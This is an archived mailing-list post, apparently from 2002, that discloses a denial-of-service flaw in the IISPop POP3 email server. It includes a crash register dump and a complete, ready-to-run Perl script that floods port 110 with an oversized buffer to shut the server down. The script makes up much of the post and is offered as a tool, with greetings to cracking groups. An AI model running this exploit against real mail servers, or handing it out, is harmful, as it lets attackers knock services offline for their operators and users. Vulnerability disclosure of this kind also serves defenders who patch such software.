hi The IISPop EMail Server (http://www.curtiscomp.com/)was designed for small networks,This is a POP3 only server, designed to be paired with the SMTP server bundled in Windows 2000/IIS 5. I have found that IISpop is vulnerable has a attack DOS caused by sends of a broad buffer (289999 byte) this attack gives the following state of the registers (tested on v 1.161 end 1.181) Access violation - code c0000005 (first chance) eax=00000041 ebx=00407d3d ecx=00000101 edx=000021ae esi=0040693d edi=00437181 eip=77e76941 esp=0112ffb0 ebp=0000026c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206 KERNEL32!GetCurrentThreadId+4: 77e76941 0000 add [eax],al ds:0023:00000041=?? (unhandled exeption in IISPop.exe (KRNELL32.DLL) 0xc0000005 : access violation exploit: #!/usr/bin/perl -w # tool : iispdos.pl # shutdown all version of IISPop # greetz crack.fr , marocit ,christal # use IO::Socket; $ARGC=@ARGV; if ($ARGC !=1) { print "\n-->"; print "\tUsage: perl iispdos.pl <host> \n"; exit; } $remo = $ARGV[0]; $buffer = "A" x 289999; print "\n-->"; print "\tconnection with $remo\n"; unless ($so = IO::Socket::INET->new (Proto => "TCP", PeerAddr => $remo, PeerPort => "110")) { print "-->"; print "\tConnection Failed...\n"; exit; } print $so "$buffer\n"; close $so; print "-->"; print "\tnow test if the distant host is down\n"; exit; _________________________________________________________ Gagne une PS2 ! Envoie un SMS avec le code PS au 61166 (0,35€ Hors coût du SMS)
This archive was generated by hypermail 2b30 : Fri Nov 15 2002 - 12:11:03 PST